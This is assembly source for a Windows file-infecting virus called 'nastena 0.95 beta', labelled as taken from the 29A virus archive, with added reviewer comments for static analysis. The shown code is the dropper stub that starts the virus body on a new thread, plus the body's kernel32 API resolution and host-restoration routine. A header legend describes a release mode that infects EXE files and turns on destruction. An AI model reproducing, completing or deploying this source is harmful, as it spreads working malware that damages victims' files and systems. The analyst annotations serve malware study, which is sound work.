
📄 29a-7.017

📁 从29A上收集的病毒源码
💻 017

;============================nastena 0.95 beta==============================;
;    This source is for educational purposes only. Author does not take		;
;            responsibility for the consequences of its usage				;
;					This is open-source program								;
.586
locals 
jumps
.model flat, stdcall

; Build-mode switches. No code in the visible part of this listing tests
; these symbols; the legend below is the author's own description.
DEBUG equ 1			; debug console
RELEASE	equ 0	; 0 here: the test configuration described in the legend below
NORELEASE	equ 1
;RELEASE=0 NORELEASE=1 - 	destruction off, infecting *.MZD, 
;					beep at infection
;RELEASE=1 NORELEASE=0 - 	destruction on,  infecting *.EXE
; NOTE(review): as published (RELEASE=0, NORELEASE=1) the legend says the
; destructive part is off and only *.MZD files are targeted. An analyst
; comparing a captured binary with this source should first establish which
; of the two configurations it was built with.

; callW f - declare f as an external procedure and emit a direct call to it.
; Used by the `start` stub (CreateThread, Sleep, ExitProcess). Because the
; symbol is an extrn, it is resolved at link time, so these API names would
; normally be visible in the built file's import table (assumed - confirm
; against the linker setup). The code after _start uses a different macro,
; xcall, which is not defined in this listing (presumably in eaxapi1.inc).
callW macro f
extrn f:proc
	call f
endm

include windows.inc
include consts.inc
include pestruct.inc
include structs.inc
include eaxapi1.inc ;definitions of macro
; MessageBox style flag, defined locally; no use of it is visible in this excerpt.
MB_TOPMOST	equ 40000h

; NOTE(review): everything from here on is assembled into .data, so the
; entry stub and the body that follows it live in a data section rather
; than a code section. An entry point located in a writable data section
; is a useful static-triage indicator.
.data
; start - entry stub of the first-generation ("dropper") build.
;   1. marks this copy as the dropper,
;   2. starts the body at _start on a new thread,
;   3. waits 30 s, then ends the process with exit code 0.
start:

	; dropper flag = 1. `dropper` is defined outside this excerpt; _start
	; later compares it with 0 to decide whether host code must be restored.
	; NOTE(review): `1 ptr` is read here as a one-byte size override - confirm.
	mov 1 ptr [dropper], 1
	lea eax, [_start]
	; Multi-operand push, operands pushed left to right. As seen by
	; CreateThread (stdcall, last push = first argument):
	;   lpThreadAttributes = 0, dwStackSize = 10000h, lpStartAddress = eax (_start),
	;   lpParameter = 0, dwCreationFlags = 0,
	;   lpThreadId = the second pushed esp value, which points at the dword
	;                written by the first `push esp` (used as scratch storage).
	push esp esp 0 0 eax 10000h 0
	callW CreateThread
	; The callee removes its six arguments; this pop drops the remaining
	; scratch dword (the thread id slot). The handle returned in eax is
	; neither checked nor closed.
	pop ecx

	
_exit:
	; Sleep(30000 ms) - presumably keeps the process alive while the new
	; thread runs; then ExitProcess(0).
	push 30000
	callW Sleep
	push 0
	callW ExitProcess


;org 100h
db ".beg."
virstart:
_realstart:
	;  after decryption execution gets here
_start:
	call recalc
recalc:
rec	db 5Dh ; pop ebp

	call get_kernel
	push kernel32_api_num
	pop ecx
__Kernel32 equ _LoadLibraryA-5
	lea esi, [ebp+__Kernel32-rec]
	call get_apis ; get kernel32 apis


	lea eax, [ebp+thread1-rec]
	push esp esp 0 0 eax 10000h 0
	xcall CreateThread
	pop ecx

	push 80
	xcall Sleep

	; restore host program if not dropper
	cmp 1 ptr [ebp+dropper-rec], 0
	jnz __567
	lea ebx, [ebp+replace-rec]
	mov edi, [ebx].to_rva
	lea esi, [ebp+backup-rec]
	mov ecx, [ebx].sizeinbytes
	pushad
	push esp
	push esp
	push PAGE_READWRITE
	push ecx
	push edi
	xcall VirtualProtect
	pop eax
	popad
	rep movsb
	; 忸耨蜞
